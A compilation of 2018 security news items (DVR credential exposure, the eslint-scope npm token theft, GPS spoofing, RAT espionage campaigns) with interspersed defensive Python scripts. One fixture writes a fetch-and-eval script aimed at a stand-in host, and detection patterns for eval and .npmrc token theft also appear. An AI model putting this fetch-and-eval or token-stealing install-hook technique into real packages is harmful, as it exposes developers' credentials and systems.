And of course, people here too have not failed to put extremely generic passwords. https://www.zoomeye.org/searchResult?q=%2Bport%3A%2237777%22%20%22admin123%22 270 devices have password as "admin123" lol.

Brickerbot is known to brick the devices he pwns, so it does not look like a happy ending for these devices. @GDI_FDN <end>

8:21 PM - Jul 13, 2018
Anubhav explained that ZoomEye scans port 37777 and caches the output in plaintext, which means that anyone with a ZoomEye account can scrape the results to obtain the credentials of tens of thousands of devices.

Anubhav notified the issue to ZoomEye asking it to remove the passwords from its cached results, but the expert is still waiting for a reply.

The expert explained that he discovered the issue after reading a post published by the author of the BrickerBot IoT malware, which exploited the flaw to hijack and brick Dahua DVRs in the past.
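As an added example (not code from the article or from NewSky Security), the check a defender would run over their own device inventory before a search engine does it for them: flag DVRs whose management port is reachable from the Internet, whose firmware is one of the two versions the article names as affected by CVE-2013-6117, and whose DDNS password is one of the defaults seen in the thread above. The inventory format, the field names, the sample devices and the extra default password are assumptions made for illustration.

```python
"""Triage a constructed DVR inventory for the exposure described above.

Added example, not code from the article or from NewSky Security. The
inventory records, the field names and the extra default password are
assumptions; only the two firmware strings, the weak passwords "123456"
and "admin123", and TCP port 37777 come from the article.
"""
import ipaddress

# Firmware versions the article names as affected by CVE-2013-6117.
VULNERABLE_FIRMWARE = {"2.608.0000.0", "2.608.GV00.0"}
DAHUA_MGMT_PORT = 37777
# Passwords called out in the thread quoted above, plus "admin" (assumed).
WEAK_PASSWORDS = {"123456", "admin123", "admin"}


def is_public(ip: str) -> bool:
    """True if the address is routable from the Internet (not RFC1918, loopback, etc.)."""
    addr = ipaddress.ip_address(ip)
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved)


def triage(devices):
    """Return a list of (ip, finding) tuples, one per problem found.

    Each device is a dict with keys: ip, firmware, open_ports (list of ints),
    ddns_password. A vulnerable firmware is rated critical when the port is
    also reachable from the Internet, high otherwise.
    """
    findings = []
    for dev in devices:
        ip = dev["ip"]
        exposed = DAHUA_MGMT_PORT in dev.get("open_ports", []) and is_public(ip)
        if exposed:
            findings.append((ip, f"tcp/{DAHUA_MGMT_PORT} reachable from the Internet"))
        if dev.get("firmware") in VULNERABLE_FIRMWARE:
            sev = "critical" if exposed else "high"
            findings.append((ip, f"{sev}: firmware {dev['firmware']} affected by CVE-2013-6117"))
        if dev.get("ddns_password", "") in WEAK_PASSWORDS:
            findings.append((ip, "weak DDNS password"))
    return findings


# Constructed sample inventory (not real devices). Python's ipaddress treats
# the RFC 5737 documentation ranges as non-global, so ordinary-looking public
# addresses are used for the "exposed" cases.
SAMPLE_INVENTORY = [
    {"ip": "51.77.12.34", "firmware": "2.608.GV00.0",
     "open_ports": [80, 37777], "ddns_password": "123456"},
    {"ip": "10.20.0.5", "firmware": "2.608.0000.0",
     "open_ports": [37777], "ddns_password": "Tq9!vLp2#x"},
    {"ip": "51.77.12.35", "firmware": "3.200.0001.0",
     "open_ports": [443], "ddns_password": "admin123"},
]

if __name__ == "__main__":
    for ip, finding in triage(SAMPLE_INVENTORY):
        print(f"{ip}: {finding}")
```

The same function can be fed from a port-scan export or an asset database; the point is that a device on a vulnerable firmware with 37777 open to the Internet needs a firewall rule today, not after the next firmware cycle.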

Director of National Intelligence warns of devastating cyber threat to US infrastructure
19.7.2018 securityaffairs BigBrothers

The Director of the National Intelligence Dan Coats warned last week of a devastating cyber threat to US infrastructure, he said that “warning lights are blinking red again.”
The Director of National Intelligence Dan Coats warned last week of a devastating cyber threat to US infrastructure, he used the following words to express his concerns:

“warning lights are blinking red again”

The U.S. intelligence chief highlighted that computer networks of US government agencies, enterprises, and academic institutions are under incessant attack launched by foreign states.

Russia, North Korea, China, and Iran are the most persistent attackers; the number of their attacks continues to increase and their level of sophistication is growing too.


The Director of National Intelligence believes that Russia is the most aggressive threat actor, and recent events demonstrate it. On Friday, Special Counsel Robert Mueller, who in February had indicted 13 Russians for a massive operation aimed at influencing the 2016 presidential election, charged 12 Russian intelligence officers working for the GRU with carrying out “large-scale cyber operations” to steal Democratic Party documents and emails.

Of the four, “Russia has been the most aggressive foreign actor, no question,” he said.

There is a great difference between the campaigns launched by China and those launched by Russia.

According to Coats, China operates primarily to steal military and industrial secrets and has “capabilities, resources that perhaps Russia doesn’t have.” The Kremlin, by contrast, operates to undermine U.S. values and democratic institutions.

Coats spoke at the Hudson Institute think tank shortly after the announcement of the indictment.

Coats warned that the threat of a “crippling cyber attack on our critical infrastructure” by a nation-state actor is growing.

“Coats said the U.S. government has not yet detected the kinds of cyber attacks and intrusions that officials say Russia launched against state election boards and voter data bases before the 2016 election.” reported Reuters.

“However, we fully realize that we are just one click away of the keyboard from a similar situation repeating itself,” Coats continued.

He drew a parallel between the current situation in cyberspace and the “alarming activities” that U.S. intelligence detected before al Qaeda carried out the Sept. 11, 2001 attacks.

“The system was blinking red. Here we are nearly two decades later and I’m here to say the warning lights are blinking red again,” he said.

While I’m writing, President Donald Trump has arrived at Finland’s Presidential Palace for a summit with Russian President Vladimir Putin.

Ahead of the Trump-Putin meeting in Helsinki on Monday, the US President said that he might ask for the extradition of the 12 Russian intelligence officers accused of attempting to interfere with the 2016 presidential election.

Journalists asked Trump whether he would request the extradition to the US of the Russian intelligence officers accused of hacking Hillary Clinton‘s presidential campaign, and he replied:

“Well, I might.” Trump said

“I hadn’t thought of that. But I certainly, I’ll be asking about it, but again, this was during the Obama administration. They were doing whatever it was during the Obama administration.”

Coats also mentioned the so-called “troll factory” operated by unnamed “individuals” affiliated with the Internet Research Agency, based in St. Petersburg, which was indicted by federal authorities in February.

These individuals have been “creating new social media accounts, masquerading as Americans and then using these accounts to draw attention to divisive issues,” he said.

Code hosting service GitHub can now scan also for vulnerable Python code
19.7.2018 securityaffairs

The code hosting service GitHub added Python to the list of programming languages that it is able to auto-scan for known vulnerabilities.
Good news for GitHub users, the platform added Python to the list of programming languages that it is able to auto-scan for known vulnerabilities.

In March, the code hosting service GitHub reported that the introduction of security alerts in November had led to a significant reduction of vulnerable code libraries on the platform.

GitHub alerts warn developers when their projects include software libraries with known flaws and provide advice on how to address the issue.

Last year GitHub first introduced the Dependency Graph, a feature that lists all the libraries used by a project. The feature supports JavaScript and Ruby, and the company announced to add the support for Python within the year.


The GitHub security alerts feature introduced in November is designed to alert developers when one of their project’s dependencies has known flaws. The Dependency graph and the security alerts feature have been automatically enabled for public repositories, but they are opt-in for private repositories.

The dependency graph allows GitHub to notify project owners when it detects a known security vulnerability in one of the dependencies and to suggest known fixes from the GitHub community.

An initial scan conducted by GitHub revealed more than 4 million vulnerabilities in more than 500,000 repositories. GitHub notified the affected users, and by December 1 more than 450,000 of the vulnerabilities had been addressed, either by updating the affected library or by removing it altogether.

Vulnerabilities are in a vast majority of cases addressed within a week by active developers.

With Python support, developers will also receive alerts for the dependencies of their Python projects.

“We’re pleased to announce that we’ve shipped Python support. As of this week, Python users can now access the dependency graph and receive security alerts whenever their repositories depend on packages with known security vulnerabilities.” reads the announcement published by GitHub quality engineer Robert Schultheis.

“We’ve chosen to launch the new platform offering with a few recent vulnerabilities. Over the coming weeks, we will be adding more historical Python vulnerabilities to our database. Going forward, we will continue to monitor the NVD feed and other sources, and will send alerts on any newly disclosed vulnerabilities in Python packages.”

The company confirmed that the scanner is enabled by default on public repositories, while for private repositories maintainers need to opt in, either by enabling security alerts in the repository settings or by giving the dependency graph access to the repository from the “Insights” tab.

“Public repositories will automatically have your dependency graph and security alerts enabled. For private repositories, you’ll need to opt in to security alerts in your repository settings or by allow access in the dependency graph section of your repository’s “Insights” tab.” concludes Schultheis.

“When vulnerability alerts are enabled, admins will receive security alerts by default. Admins can also add teams or individuals as recipients for security alerts by going into their repository’s settings page and navigating to the “Alerts” tab.”
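The matching that a dependency alert performs, as an added example rather than GitHub's own code: pins from a requirements file are compared against an advisory feed whose entries give a package, the version that introduced the flaw and the version that fixed it. The advisory identifiers, package names and version ranges below are constructed for illustration and describe no real vulnerabilities.

```python
"""Match pinned Python dependencies against a small advisory list.

Added example illustrating the kind of check behind GitHub's security
alerts; it is not GitHub's code. The advisory entries, the package names
and the version ranges are constructed and describe no real vulnerabilities.
"""
import re

# name==version, optional trailing comment; other specifiers are not pins.
REQ_LINE = re.compile(r"^\s*([A-Za-z0-9_.-]+)\s*==\s*([0-9][0-9A-Za-z.]*)\s*(?:#.*)?$")


def parse_version(v: str):
    """Turn '1.10.2' into (1, 10, 2) so versions compare numerically, not as strings."""
    parts = []
    for piece in v.split("."):
        m = re.match(r"\d+", piece)
        parts.append(int(m.group()) if m else 0)
    return tuple(parts)


def parse_requirements(text: str):
    """Return ({package: version} for '==' pins, [lines that could not be assessed]).

    An alert needs an exact installed version to compare against a range,
    which is why a pin (or a lock file) is the input here.
    """
    pinned, unpinned = {}, []
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#") or stripped.startswith("-"):
            continue
        m = REQ_LINE.match(stripped)
        if m:
            # Normalise the name the way package indexes do: lowercase, '-' for '_'.
            pinned[m.group(1).lower().replace("_", "-")] = m.group(2)
        else:
            unpinned.append(stripped)
    return pinned, unpinned


def affected(version: str, advisory) -> bool:
    """An advisory covers [introduced, fixed); 'fixed' may be None when no fix exists."""
    v = parse_version(version)
    lo = parse_version(advisory["introduced"])
    hi = advisory["fixed"]
    return v >= lo and (hi is None or v < parse_version(hi))


def find_alerts(requirements_text: str, advisories):
    """Return one alert dict for every pinned dependency that an advisory covers."""
    pinned, _ = parse_requirements(requirements_text)
    alerts = []
    for adv in advisories:
        name = adv["package"].lower()
        if name in pinned and affected(pinned[name], adv):
            alerts.append({
                "package": name,
                "installed": pinned[name],
                "advisory": adv["id"],
                "fix": adv["fixed"] or "no fixed version yet",
            })
    return alerts


# Constructed advisory feed (hypothetical identifiers, packages and ranges).
SAMPLE_ADVISORIES = [
    {"id": "EXAMPLE-2018-0001", "package": "examplelib",
     "introduced": "0.0.0", "fixed": "2.4.1"},
    {"id": "EXAMPLE-2018-0002", "package": "yamlish",
     "introduced": "3.0.0", "fixed": None},
]

# Constructed requirements file.
SAMPLE_REQUIREMENTS = """
# pinned app dependencies
examplelib==2.3.0
yamlish==3.1.2
requests-like>=2.0   # not pinned: cannot be assessed
Safe_Pkg==1.0.0
"""

if __name__ == "__main__":
    for a in find_alerts(SAMPLE_REQUIREMENTS, SAMPLE_ADVISORIES):
        print(f"{a['package']}=={a['installed']}: {a['advisory']}, fix: {a['fix']}")
```

Two details matter in practice and are the reason the comparison is done on tuples rather than strings: "1.10.0" sorts before "1.9.9" as text but after it as a version, and an advisory with no fixed version must still alert, since the only remedy is to remove or replace the package.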

Trump – Putin meeting: “I don’t see any reason” for Russia to interfere with the US presidential election
19.7.2018 securityaffairs BigBrothers

Russian President Vladimir Putin ‘just said it’s not Russia,’ and President Trump believes him.
Today the controversial meeting between Russian President Vladimir Putin and US President Donald Trump was held in Helsinki, and as expected the Russian President denied any interference with the 2016 US election.
After the meeting, Putin and Trump held a joint news conference, and the US President confirmed his trust in Putin's words.

“So I have great confidence in my intelligence people, but I will tell you that President Putin was extremely strong and powerful in his denial today,” Trump said.

Special Counsel Robert Mueller has a different opinion about Russia’s alleged interference in the 2016 presidential election: his investigation led to the indictment of 12 Russian intelligence officers working for the GRU for carrying out “large-scale cyber operations” to steal Democratic Party documents and emails.

“I don’t see any reason” for Russia to interfere with the US presidential election, was Trump’s view.

On Friday, director of national intelligence Daniel R. Coats warned of a devastating cyber threat to US infrastructure, he said that “warning lights are blinking red again.”

The Director of National Intelligence believes that Russia is the most aggressive threat actor and recent events demonstrate it.

“Russia has been the most aggressive foreign actor, no question,” he said.

There is a great difference between the campaigns launched by China and those launched by Russia.

According to Coats, China operates primarily to steal military and industrial secrets and has “capabilities, resources that perhaps Russia doesn’t have.” The Kremlin, by contrast, operates to undermine U.S. values and democratic institutions.

“The role of the Intelligence Community is to provide the best information and fact-based assessments possible for the President and policymakers. We have been clear in our assessments of Russian meddling in the 2016 election and their ongoing, pervasive efforts to undermine our democracy, and we will continue to provide unvarnished and objective intelligence in support of our national security,” said Coats in a press statement released after the Trump-Putin press event.

Photo caption: HELSINKI, FINLAND – JULY 16: U.S. President Donald Trump (L) and Russian President Vladimir Putin answer questions about the 2016 U.S Election collusion during a joint press conference after their summit on July 16, 2018 in Helsinki, Finland. The two leaders met one-on-one and discussed a range of issues including the 2016 U.S Election collusion. (Photo by Chris McGrath/Getty Images)

Below is an excerpt from the full transcript of the Helsinki press conference concerning the alleged interference in the 2016 presidential election.

“Once again, President Trump mentioned issue of so-called interference of Russia with the American elections. I had to reiterate things I said several times, including during our personal contacts, that the Russian state has never interfered and is not going to interfere in internal American affairs, including election process. Any specific material, if such things arise, we are ready to analyze together. For instance, we can analyze them through the joint working group on cyber security, the establishment of which we discussed during our previous contacts.” said Putin.

“During today’s meeting, I addressed directly with President Putin the issue of Russian interference in our elections. I felt this was a message best delivered in person. Spent a great deal of time talking about it. And President Putin may very well want to address it and very strongly, because he feels strongly about it and he has an interesting idea. We also discussed one of the most critical challenges facing humanity, nuclear proliferation. I provided an update on my meeting last month with Chairman Kim on the denuclearization of North Korea. After today, I am very sure that President Putin and Russia want very much to end that problem. Going to work with us, and I appreciate that commitment.” said Trump.

Crooks deployed malicious ESLint packages that steal software registry login tokens
19.7.2018 securityaffairs

Hackers compromised the npm account of an ESLint maintainer and published malicious versions of eslint packages to the npm registry.
Crooks compromised an ESLint maintainer’s account last week and uploaded malicious packages that attempted to steal login tokens from the npm software registry. npm is the package manager for JavaScript and the world’s largest software registry.

ESLint is an open source “pluggable and configurable linter tool” for identifying and reporting on patterns in JavaScript; it was created by Nicholas Zakas.

The affected packages hosted on npm are:

eslint-scope version 3.7.2, a scope analysis library used by older versions of eslint and by the latest versions of babel-eslint and webpack;
eslint-config-eslint version 5.0.2, a configuration used internally by the ESLint team.
Once the tainted packages are installed, they will download and execute code from pastebin.com that was designed to grab the content of the user’s .npmrc file and send the information to the attacker. This file usually contains access tokens for publishing to npm.

“The attacker modified package.json in both eslint-scope@3.7.2 and eslint-config-eslint@5.0.2, adding a postinstall script to run build.js. This script downloads another script from Pastebin and evals its contents.” wrote Henry Zhu about the eslint-scope attack.

“The script extracts the _authToken from a user’s .npmrc and sends it to histats and statcounter inside the Referer header,”

The packages were quickly removed once they were discovered by maintainers and the content on pastebin.com was taken down.

“On July 12th, 2018, an attacker compromised the npm account of an ESLint maintainer and published malicious versions of the eslint-scope and eslint-config-eslint packages to the npm registry. On installation, the malicious packages downloaded and executed code from pastebin.com which sent the contents of the user’s .npmrc file to the attacker.” reads the security advisory published by ESLint.

“An .npmrc file typically contains access tokens for publishing to npm. The malicious package versions are eslint-scope@3.7.2 and eslint-config-eslint@5.0.2, both of which have been unpublished from npm. The pastebin.com paste linked in these packages has also been taken down.”
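An added example, not ESLint's or npm's code, of how a reviewer can audit an installed node_modules tree for the pattern described above: a lifecycle hook that launches a script which fetches remote code and evaluates it. The audit builds a throw-away tree with two constructed packages, one clean and one that mimics the malicious behaviour; the package names, the marker patterns and the stand-in script are assumptions.

```python
"""Audit a node_modules tree for install-time lifecycle scripts.

Added example, not ESLint's or npm's code. It builds a throw-away
node_modules directory with two constructed packages (one clean, one whose
postinstall hook runs a script that fetches remote code and evals it, the
pattern described in the advisory above) and reports what it finds. The
marker strings, the package names and the stand-in script are assumptions.
"""
import json
import os
import re
import tempfile

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Markers worth a second look inside anything launched at install time.
SUSPICIOUS = {
    "remote fetch": re.compile(r"""https?://|\brequire\(['"]https?['"]\)"""),
    "dynamic eval": re.compile(r"\beval\s*\(|new\s+Function\s*\("),
    "npm credentials": re.compile(r"\.npmrc|_authToken"),
}


def script_files(pkg_dir: str, command: str):
    """Best effort: resolve 'node foo.js' style commands to files inside the package."""
    files = []
    for token in command.split():
        candidate = os.path.join(pkg_dir, token)
        if token.endswith(".js") and os.path.isfile(candidate):
            files.append(candidate)
    return files


def audit_node_modules(root: str):
    """Return findings as (package, hook, command, [matched markers]).

    Every lifecycle hook is reported, even with no markers, because an
    install-time hook is itself the thing a reviewer should know about.
    """
    findings = []
    for dirpath, _, filenames in os.walk(root):
        if "package.json" not in filenames:
            continue
        with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
            try:
                manifest = json.load(fh)
            except json.JSONDecodeError:
                continue
        scripts = manifest.get("scripts") or {}
        for hook in LIFECYCLE_HOOKS:
            if hook not in scripts:
                continue
            command = scripts[hook]
            text = command
            for path in script_files(dirpath, command):
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text += "\n" + fh.read()
            reasons = [name for name, rx in SUSPICIOUS.items() if rx.search(text)]
            findings.append((manifest.get("name", dirpath), hook, command, reasons))
    return findings


def build_sample_tree() -> str:
    """Create a constructed node_modules tree in a temp dir and return its root."""
    root = tempfile.mkdtemp(prefix="nm_audit_")
    clean = os.path.join(root, "node_modules", "left-pad-ish")
    os.makedirs(clean)
    with open(os.path.join(clean, "package.json"), "w", encoding="utf-8") as fh:
        json.dump({"name": "left-pad-ish", "version": "1.0.0",
                   "scripts": {"test": "node test.js"}}, fh)
    bad = os.path.join(root, "node_modules", "evil-scope")
    os.makedirs(bad)
    with open(os.path.join(bad, "package.json"), "w", encoding="utf-8") as fh:
        json.dump({"name": "evil-scope", "version": "3.7.2",
                   "scripts": {"postinstall": "node build.js"}}, fh)
    with open(os.path.join(bad, "build.js"), "w", encoding="utf-8") as fh:
        # Constructed stand-in for the behaviour described above; .invalid is
        # a reserved TLD, so nothing here resolves.
        fh.write(
            "const https = require('https');\n"
            "https.get('https://paste.invalid/x', r => { let d = ''; "
            "r.on('data', c => d += c); r.on('end', () => eval(d)); });\n"
        )
    return root


if __name__ == "__main__":
    for pkg, hook, cmd, reasons in audit_node_modules(build_sample_tree()):
        print(f"{pkg}: {hook} -> {cmd!r} {reasons or 'no markers'}")
```

The second stage that actually read .npmrc was only ever on Pastebin, which is why the "npm credentials" marker does not fire on the stand-in build.js: a static audit sees the fetch-and-eval, not what was fetched. That is the argument for installing with `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) in CI and enabling scripts only for packages that are known to need them.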


The npm login tokens grabbed by the malicious packages do not include the user’s npm password, but npm opted to revoke all possibly impacted tokens. Users can also revoke existing tokens themselves, as npm suggested.

“We have now invalidated all npm tokens issued before 2018-07-12 12:30 UTC, eliminating the possibility of stolen tokens being used maliciously. This is the final immediate operational action we expect to take today.” reads the npm’s incident report.

Further investigation allowed the maintainers to determine that the account was compromised because the owner had reused the same password on multiple accounts and had not enabled two-factor authentication on their npm account.

ESLint released eslint-scope version 3.7.3 and eslint-config-eslint version 5.0.3.

Users who installed the malicious packages should update to the fixed versions and, as npm recommended, revoke any tokens issued before the incident.

Researchers show how to manipulate road navigation systems with low-cost devices
19.7.2018 securityaffairs Mobil

Researchers have developed a tool that poses as GPS satellites to deceive nearby GPS receivers and manipulate road navigation systems.
Researchers have developed a tool that poses as GPS satellites to deceive nearby GPS receivers. The kit could be used to deceive the receivers used by navigation systems and send drivers in the wrong direction.

“we explore the feasibility of a stealthy manipulation attack against road navigation systems. The goal is to trigger the fake turn-by-turn navigation to guide the victim to a wrong destination without being noticed.” reads the research paper published by the experts.

“Our key idea is to slightly shift the GPS location so that the fake navigation route matches the shape of the actual roads and trigger physically possible instructions.”

The group of researchers is composed of three teams from Microsoft, Virginia Tech in the US, and the University of Electronic Science and Technology of China.

The researchers were able to spoof the signals transmitted by satellites to mobile devices and to the navigation systems used in the automotive industry.

In the tests, the experts were able to change routes with up to 95 per cent success. The researchers built a radio-transmitting device based on a Raspberry Pi using just $223 of components.

The radio transmitting device broadcasts fake location data that overpowers the genuine satellite signals, so the receiver no longer obtains real positioning data.

In a real attack scenario, the device could be used to deceive the navigation systems in cars.


“We show that adversaries can build a portable spoofer with low costs (about $223), which can easily penetrate the car body to take control of the GPS navigation system.” continues the paper.

“Our measurement shows that effective spoofing range is 40–50 meters and the target device can consistently latch onto the false signals without losing connections,”

In order to make the attack stealthy, the researchers experimented with stashing the spoofing device in the trunk of a car or under the back seat.

They were able to add new route details via a cellular network connection without following the target.

In a field test conducted in a Chinese parking lot, the researchers deceived a navigation system in 48 seconds with the device hidden in the trunk, and in just 38 seconds with the device under the seat.

The experts used data from OpenStreetMap to construct routes for the target.

“Compared to spoofing a drone or a ship, there are unique challenges to manipulate the road navigation systems. First, road navigation attack has strict geographical constraints. It is far more challenging to perform GPS spoofing attacks in real-time while coping with road maps and vehicle speed limits.” continues the paper.

“In addition, human drivers are in the loop of the attack, which makes a stealthy attack necessary.”

Experts highlighted that the spoofing attacks could be very effective, 40 volunteer drivers involved in a trial found that 95 per cent of the time the attackers were able to trick the targets into following the fake routes.

Such attacks could be particularly dangerous with self-driving cars and trucks.

The researchers also proposed countermeasures, such as encrypting or authenticating civilian GPS signals, which today are broadcast in the clear (unlike the encrypted military signal).

Cyber espionage campaign targets Samsung service centers in Italy
19.7.2018 securityaffairs CyberSpy

Security researchers from Italian security firm TG Soft have uncovered an ongoing malware campaign targeting Samsung service centers in Italy.
“TG Soft’s Research Centre (C.R.A.M.) has analyzed the campaign of spear-phishing on 2 April 2018 targeting the service centers of Samsung Italy.” reads the analysis published by TG Soft.

“The campaign analyzed is targeting only the service centers of Samsung Italy; it’s a multi-stage attack and we have monitored it until July 2018.”

The campaign has similarities with the attack campaigns that targeted similar electronics service centers in Russia, which were discovered by Fortinet in June. The attackers’ motivation is still unclear; the experts explained that the malicious code is not particularly sophisticated.

The attackers used spear-phishing emails sent to Samsung Italy service center workers. The messages have attached weaponized Excel documents.

The documents trigger CVE-2017-11882 to infect users. The flaw is a memory-corruption bug in the legacy Office Equation Editor component (EQNEDT32.EXE) that Microsoft patched in November 2017; the exploit needs no macros, so simply opening the document on an unpatched system is enough to run the attacker’s code.

According to a technical report published by the experts, this attack and the one against Russian service centers offering maintenance and support for various electronic goods started in the same period, in March.

While the Russian service centers were hit by the Imminent Monitor RAT, the attacks on Samsung Italy service centers also involved other RATs, such as NetWire and njRAT.

The quality of the spear phishing messages was high in both campaigns; they appear to have been written by native speakers of Italian and Russian, respectively.

The attachment used in this campaign is an Excel document titled “QRS non autorizzati.xlsx”, while the phishing messages are signed with the name of the Samsung IT Service Manager, a real employee of Samsung Italia, and include the employee’s email address and phone numbers.


At the time, the experts were not able to attribute the attack to a specific threat actor. Electronics service centers do not appear particularly interesting targets in themselves, since the volume of data they manage is small.

Probably the attackers want to compromise the remote management tools used by these services in order to gain control over the computers of the customers that request support from the electronics service centers.

“Command and control servers use services like noip.me or ddns.net, which in combination with a VPN, allow hiding the IP address of the server where the exfiltrated data is sent.” concludes the report.
“During the analysis in some cases, the C2 servers were not online and the RAT failed to contact them, and then returned active after a few tens of hours with a new IP address.
The actors behind this attack remain unknown …”

The Italian version of the report, which also includes the IoCs, is available here.
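Detection logic built from two observations in the report quoted above, as an added example that is not TG Soft's code: lookups of hostnames under dynamic-DNS services (the report names noip.me and ddns.net) and a C2 whose address changed after an outage. The resolver log format, the hostnames, the answers and the two extra provider suffixes are assumptions made for illustration.

```python
"""Flag dynamic-DNS C2 candidates in a constructed DNS resolver log.

Added example, not TG Soft's code. It applies two observations from the
report quoted above: the RATs resolved their C2 under dynamic-DNS services
(noip.me, ddns.net), and the C2 came back after an outage on a new IP
address. The log format, hostnames, answers and the two extra provider
suffixes are assumptions.
"""
from collections import defaultdict

# Suffixes from the report plus two common no-ip ones (assumed; extend as needed).
DDNS_SUFFIXES = (".noip.me", ".ddns.net", ".hopto.org", ".zapto.org")


def parse_line(line: str):
    """'<timestamp> <client> <qname> <answer>' -> dict, or None for unparseable lines."""
    parts = line.split()
    if len(parts) != 4:
        return None
    ts, client, qname, answer = parts
    return {"ts": ts, "client": client, "qname": qname.rstrip(".").lower(), "answer": answer}


def is_ddns(qname: str) -> bool:
    """True when the name sits under one of the dynamic-DNS provider domains."""
    return qname.endswith(DDNS_SUFFIXES)


def analyse(log_lines):
    """Return {qname: {"clients": set, "answers": [distinct IPs in order], "ip_churn": bool}}.

    Only dynamic-DNS names are kept. NXDOMAIN or empty answers count as
    lookups but not as addresses; that is how an offline C2 shows up.
    """
    seen = defaultdict(lambda: {"clients": set(), "answers": [], "ip_churn": False})
    for line in log_lines:
        rec = parse_line(line)
        if rec is None or not is_ddns(rec["qname"]):
            continue
        entry = seen[rec["qname"]]
        entry["clients"].add(rec["client"])
        if rec["answer"] not in ("NXDOMAIN", "-") and rec["answer"] not in entry["answers"]:
            entry["answers"].append(rec["answer"])
        entry["ip_churn"] = len(entry["answers"]) > 1
    return dict(seen)


def alerts(log_lines):
    """Names worth a ticket: any dynamic-DNS lookup, escalated when the answer changed."""
    out = []
    for name, e in analyse(log_lines).items():
        sev = "high" if e["ip_churn"] else "medium"
        out.append((sev, name, sorted(e["clients"]), e["answers"]))
    return sorted(out)


# Constructed log lines: timestamp, client, queried name, answer.
SAMPLE_LOG = """\
2018-04-02T09:15:01 10.1.1.23 support-sync.ddns.net. 198.51.100.11
2018-04-02T09:15:04 10.1.1.23 www.example.com. 203.0.113.200
2018-04-03T11:02:10 10.1.1.23 support-sync.ddns.net. NXDOMAIN
2018-04-05T08:40:33 10.1.1.23 support-sync.ddns.net. 203.0.113.42
2018-04-05T08:41:00 10.1.1.57 assist-srv.noip.me. 192.0.2.9
""".splitlines()

if __name__ == "__main__":
    for sev, name, clients, answers in alerts(SAMPLE_LOG):
        print(f"[{sev}] {name} clients={clients} answers={answers}")
```

Dynamic-DNS lookups are not malicious on their own, so the medium alert is a hunting lead rather than an incident; the escalation to high is the report's own signature of this campaign, a name that resolved, went dark, and came back somewhere else.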

QUASAR, SOBAKEN AND VERMIN RATs involved in espionage campaign on Ukraine
19.7.2018 securityaffairs

Security experts from ESET uncovered an ongoing cyber espionage campaign aimed at Ukrainian government institutions and involving three different RATs, including the custom-made VERMIN.
Security researchers from ESET uncovered an ongoing cyber espionage campaign aimed at Ukrainian government institutions, attackers used at least three different remote access Trojans (RATs).

The campaign was first spotted in January by experts from Palo Alto Networks, when the researchers discovered a new piece of malware, tracked as VERMIN RAT, targeting Ukrainian organizations.

“Pivoting further on the initial samples we discovered, and their infrastructure, revealed a modestly sized campaign going back to late 2015 using both Quasar RAT and VERMIN.” reads the report from Palo Alto Networks.


Back to the present: the experts discovered that the attackers used several RATs to steal sensitive documents, and they collected evidence of the involvement of the Quasar RAT, the Sobaken RAT and Vermin.

The Quasar RAT is available for free on GitHub, and many other attackers have used it in their campaigns, including the Gaza Cybergang, also known as Gaza Hackers Team and Molerats. Sobaken is an improved version of Quasar RAT, which includes several anti-sandbox and other evasion mechanisms.

The RATs have been used against different targets at the same time, experts noticed they share some infrastructure and connect to the same C&C servers.


The threat actors do not appear to have advanced skills; their attack vector is spear-phishing messages, and they have been quite successful in using social engineering to lure victims into opening the email and downloading and executing the malicious code.

“Even though these threat actors don’t seem to possess advanced skills or access to 0-day vulnerabilities, they have been quite successful in using social engineering to both distribute their malware and fly under the radar for extended periods of time.” reads the analysis published by ESET.

“We were able to trace attacker activity back to October 2015; however, it is possible that the attackers have been active even longer. These attackers use three different .NET malware strains in their attacks – Quasar RAT, Sobaken (a RAT derived from Quasar) and a custom-made RAT called Vermin. All three malware strains have been in active use against different targets at the same time, they share some infrastructure and connect to the same C&C servers.”

Some emails carried weaponized Word documents attempting to exploit CVE-2017-0199; the attackers used a dropper that masquerades as legitimate software (from Adobe, Intel or Microsoft) to deliver the final payload.

The threat actors used a scheduled task that executes the malware every 10 minutes to achieve persistence on the infected machine.

“The installation procedure is the same for all three malware strains used by these attackers. A dropper drops a malicious payload file (Vermin, Quasar or Sobaken malware) into the %APPDATA% folder, in a subfolder named after a legitimate company (usually Adobe, Intel or Microsoft).” continues the report.

“Then it creates a scheduled task that runs the payload every 10 minutes to ensure its persistence.”
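Those two installation traits (a binary under %APPDATA% in a vendor-named folder, re-launched by a scheduled task every 10 minutes) are cheap to hunt for across a fleet. The script below is an added example, not code from the ESET report: it parses the CSV that `schtasks /query /fo CSV /v` produces and flags tasks whose action lives under a vendor-named AppData folder and repeats at least every 10 minutes. The column names "Task To Run" and "Repeat: Every" and the "0 Hour(s), 10 Minute(s)" interval format are taken from that tool's output but should be treated as assumptions to verify against your own export; the sample rows, hostnames, user names and paths are constructed.

```python
"""Hunt scheduled tasks that match the dropper's persistence pattern.

Added example (not ESET's code). Input is the CSV from:
    schtasks /query /fo CSV /v > tasks.csv
Only the columns used here appear in the sample; the real export has many more,
and csv.DictReader selects by header name, so extra columns are harmless.
Assumption: column names and the "H Hour(s), M Minute(s)" interval format match
your Windows build; verify against a real export.
"""
import csv
import io
import re

# Vendor-named folders the report saw under %APPDATA% (usually Adobe, Intel or Microsoft).
SUSPECT_PARENTS = ("adobe", "intel", "microsoft")

# Constructed sample export (hostnames, users and paths are made up).
SAMPLE_CSV = r'''"HostName","TaskName","Task To Run","Run As User","Schedule Type","Repeat: Every"
"WKS01","\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c","SYSTEM","Weekly","N/A"
"WKS01","\Adobe Update Task","C:\Users\olena\AppData\Roaming\Adobe\AdobeUpdate.exe","WKS01\olena","One Time Only","0 Hour(s), 10 Minute(s)"
"WKS01","\Intel Driver Check","%APPDATA%\Intel\igfxsvc.exe","WKS01\olena","Daily","0 Hour(s), 10 Minute(s)"
"WKS01","\OneDrive Standalone Update","C:\Users\olena\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe","WKS01\olena","Daily","N/A"
'''

_INTERVAL = re.compile(r"(\d+) Hour\(s\), (\d+) Minute\(s\)")
# %APPDATA% expands to ...\AppData\Roaming; Local is included to widen the hunt.
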